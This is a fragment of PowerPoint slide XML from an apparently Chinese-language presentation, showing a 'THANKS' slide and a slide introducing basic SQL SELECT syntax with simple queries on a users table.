              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="椭圆 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CAC251B-DFD8-4FCF-A242-641CFE6CBC55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7431270" y="3560517"/>
            <a:ext cx="135053" cy="135053"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="组合 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21F515CB-CC92-4CCD-8407-7FCEE9275C71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4224449" y="3926656"/>
            <a:ext cx="3763199" cy="507516"/>
            <a:chOff x="4064896" y="4176518"/>
            <a:chExt cx="3763199" cy="507516"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="矩形: 圆角 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{994BA216-85DF-47AB-ADED-A155C8B9B42A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4064896" y="4176518"/>
              <a:ext cx="3763199" cy="486698"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 50000"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="矩形 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4E64AE6-D689-4B17-A00F-89F5EF0D9A7F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5904671" y="4222369"/>
              <a:ext cx="184731" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="矩形: 圆角 92">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75E737E0-FBC4-4515-BB09-A467653EF578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224570" y="-773"/>
            <a:ext cx="888523" cy="2024781"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="475574"/>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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="椭圆 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE8524D7-AA18-4DB2-8A4C-D4B2ED2F3056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3926134" y="4476234"/>
            <a:ext cx="192079" cy="192079"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="98" name="矩形: 圆角 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E24D5ACD-59BD-448F-A0AD-AC07CF1A1435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10112784" y="4822666"/>
            <a:ext cx="888523" cy="2024781"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="475574"/>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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A42A9867-1C76-420B-9873-BF879F367B41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4150761" y="2544854"/>
            <a:ext cx="3890476" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>THANKS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2638071143"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="428990" y="347084"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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pc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="675054" y="628441"/>
            <a:ext cx="3447063" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>基本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="3600" dirty="0"/>
              <a:t>知识</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8E35212-D512-4A99-8389-6CDF23717816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1950098" y="1291200"/>
            <a:ext cx="3375001" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>简单查询（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4686975-B908-4659-82DA-2068697D7BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089465" y="2104306"/>
            <a:ext cx="3693127" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>列名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="文本框 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE36105F-7A47-405B-B64E-A0ACAF875848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1077431" y="2558554"/>
            <a:ext cx="7221763" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Select</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>列名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>条件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>表达式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549FA15F-5863-4EE0-9A8D-0E74E922D605}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1035060" y="4011274"/>
            <a:ext cx="4290039" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>from users;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0454E7AD-8FC0-477B-A9FA-8957036ADF2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8525970" y="912761"/>
            <a:ext cx="1028578" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>users</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{807B7629-09B4-4135-8691-57ABF13A18AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1035060" y="4472939"/>
            <a:ext cx="6289471" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Select  username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>from users where id=1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="表格 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5348A91-592C-41EB-B75D-6BF7291150C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
